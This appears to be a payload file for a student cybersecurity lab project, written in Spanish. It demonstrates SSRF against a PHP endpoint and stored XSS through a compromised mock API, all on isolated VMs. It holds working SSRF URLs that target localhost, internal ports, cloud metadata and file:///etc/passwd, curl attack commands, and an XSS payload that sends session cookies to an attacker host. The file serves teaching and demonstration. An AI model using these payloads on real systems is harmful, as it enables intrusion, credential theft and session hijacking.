# Payloads de Demostracion - Proyecto Ciberseguridad 2026
# Uso exclusivo en entorno controlado y aislado (VMs Kali + Ubuntu Server).
# Mapeo: API7:2023 (SSRF / CWE-918) | API10:2023 (Consumo No Seguro / CWE-20, CWE-79)

# =============================================================================
# SECCION 1: SSRF (API7:2023 / CWE-918)
# Vector: campo url_repositorio en POST /backend/crear_perfil.php
# El servidor ejecuta file_get_contents() con la URL sin validacion.
# =============================================================================

# --- 1.1 Peticion legitima (baseline) ---
# Demuestra el flujo normal antes de explotar la vulnerabilidad.
https://github.com/usuario/proyecto-ejemplo

# --- 1.2 Acceso a servicio interno via localhost ---
# Demuestra que el servidor actua como proxy hacia servicios en localhost.
# Respuesta esperada: preview_repositorio con JSON de la API mock.
http://localhost:5000/repos

# --- 1.3 Acceso a servicio interno via 127.0.0.1 ---
# Variante de bypass de filtros que bloquean la palabra "localhost".
http://127.0.0.1:5000/repos

# --- 1.4 Escaneo de puertos internos (SSH) ---
# Demuestra reconocimiento de servicios internos via diferencias en timing/respuesta.
# Respuesta esperada: estado_conexion=error_conexion o respuesta SSH en preview.
http://127.0.0.1:22

# --- 1.5 Escaneo de puertos internos (Redis) ---
# Demuestra deteccion de servicios adicionales en la red interna de la VM.
http://127.0.0.1:6379

# --- 1.6 Escaneo de red interna (rango privado) ---
# Demuestra que el servidor puede consultar otras maquinas en la red interna.
# Reemplazar x.x con la IP real de otra VM en la red host-only.
http://192.168.56.101:80

# --- 1.7 Metadatos de instancia cloud (AWS/GCP/Azure) ---
# Demuestra acceso a credenciales de instancia via endpoint de metadatos.
# Solo funcional si la VM victima corre en cloud con metadata habilitado.
http://169.254.169.254/latest/meta-data/

# --- 1.8 Lectura de archivos locales via esquema file:// ---
# Demuestra exfiltracion de archivos del sistema de archivos del servidor.
# Respuesta esperada: contenido de /etc/passwd en preview_repositorio.
file:///etc/passwd

# --- 1.9 Lectura de archivo de datos de la aplicacion ---
# Demuestra acceso a datos internos de la app (perfiles guardados).
file:///ruta/absoluta/al/proyecto/data/usuarios.txt

# --- 1.10 Comando curl de ejemplo para SSRF ---
# curl -X POST http://192.168.56.100:8080/backend/crear_perfil.php \
#   -F "nombre=Atacante" \
#   -F "url_repositorio=http://127.0.0.1:5000/repos"


# =============================================================================
# SECCION 2: Consumo No Seguro de APIs + XSS (API10:2023 / CWE-20, CWE-79)
# Vector: POST /update_repos en api_mock.py (API de terceros comprometida)
# El backend confia ciegamente en la respuesta y el frontend usa innerHTML.
# =============================================================================

# --- 2.1 XSS basico con <script> (propagacion, NO ejecucion) ---
# OJO: un <script> insertado via innerHTML NO se auto-ejecuta (estandar HTML5).
# Sirve para demostrar que el payload se PROPAGA sin sanitizar (backend -> DOM),
# pero para la EJECUCION en vivo hay que usar el payload 2.2 (<img onerror>).
# Comando:
# curl -X POST http://192.168.56.100:5000/update_repos \
#   -H "Content-Type: application/json" \
#   -d '[{"nombre":"repo-malicioso","descripcion":"<script>alert(\"XSS\")</script>","url":"https://evil.com","lenguaje":"JS"}]'

[{"nombre":"repo-malicioso","descripcion":"<script>alert('XSS')</script>","url":"https://evil.com","lenguaje":"JavaScript"}]

# --- 2.2 XSS con event handler (SI se ejecuta - payload de la demo en vivo) ---
# <img> con onerror que dispara JavaScript. alert(document.domain) es a prueba de
# fallos: sin comillas ni espacios, funciona igual en el shell y en el atributo
# HTML (un onerror SIN comillas se cortaria en el primer espacio). Muestra el
# dominio de la victima, evidenciando que el JS corrio en SU contexto.
# Comando:
# curl -X POST http://192.168.56.100:5000/update_repos \
#   -H "Content-Type: application/json" \
#   -d '[{"nombre":"repo-img","descripcion":"<img src=x onerror=alert(document.domain)>","url":"https://evil.com","lenguaje":"HTML"}]'

[{"nombre":"repo-img","descripcion":"<img src=x onerror=alert(document.domain)>","url":"https://evil.com","lenguaje":"HTML"}]

# Variante con mensaje de texto (tiene espacios -> el onerror necesita comillas,
# lo que choca con el escapado del shell). Guarda este JSON en xss.json y envialo
# con:  curl -X POST http://192.168.56.100:5000/update_repos -H "Content-Type: application/json" -d @xss.json
# [{"nombre":"repo-img","descripcion":"<img src=x onerror=\"alert('XSS - Grupo 6')\">","url":"https://evil.com","lenguaje":"HTML"}]

# --- 2.3 XSS con robo de cookies (demostracion avanzada) ---
# Demuestra exfiltracion de cookies de sesion via fetch a servidor del atacante.
# Reemplazar ATTACKER_IP con la IP de la VM Kali.
# Comando:
# curl -X POST http://192.168.56.100:5000/update_repos \
#   -H "Content-Type: application/json" \
#   -d '[{"nombre":"repo-cookie","descripcion":"<img src=x onerror=\"fetch('http://ATTACKER_IP:8000/?c='+document.cookie)\">","url":"https://evil.com","lenguaje":"JS"}]'

[{"nombre":"repo-cookie","descripcion":"<img src=x onerror=\"fetch('http://192.168.56.101:8000/?c='+document.cookie)\">","url":"https://evil.com","lenguaje":"JavaScript"}]

# --- 2.4 Inyeccion de HTML malicioso en multiples campos ---
# Demuestra que todos los campos del JSON se renderizan sin sanitizar.
# Comando:
# curl -X POST http://192.168.56.100:5000/update_repos \
#   -H "Content-Type: application/json" \
#   -d '[{"nombre":"<b style=\"color:red\">HACKED</b>","descripcion":"<iframe src=\"javascript:alert(1)\"></iframe>","url":"javascript:alert(1)","lenguaje":"<script>alert(1)</script>"}]'

[{"nombre":"<b style=\"color:red\">HACKED</b>","descripcion":"<iframe src=\"javascript:alert(1)\"></iframe>","url":"javascript:alert(1)","lenguaje":"<script>alert(1)</script>"}]

# --- 2.5 Payload combinado: SSRF + compromiso de API ---
# Paso 1: usar SSRF para descubrir la API interna (http://127.0.0.1:5000/repos)
# Paso 2: comprometer la API directamente desde Kali (POST /update_repos)
# Paso 3: la victima carga el portafolio y ejecuta el XSS inyectado.
# Este flujo demuestra la cadena completa API7 -> API10 -> CWE-79.
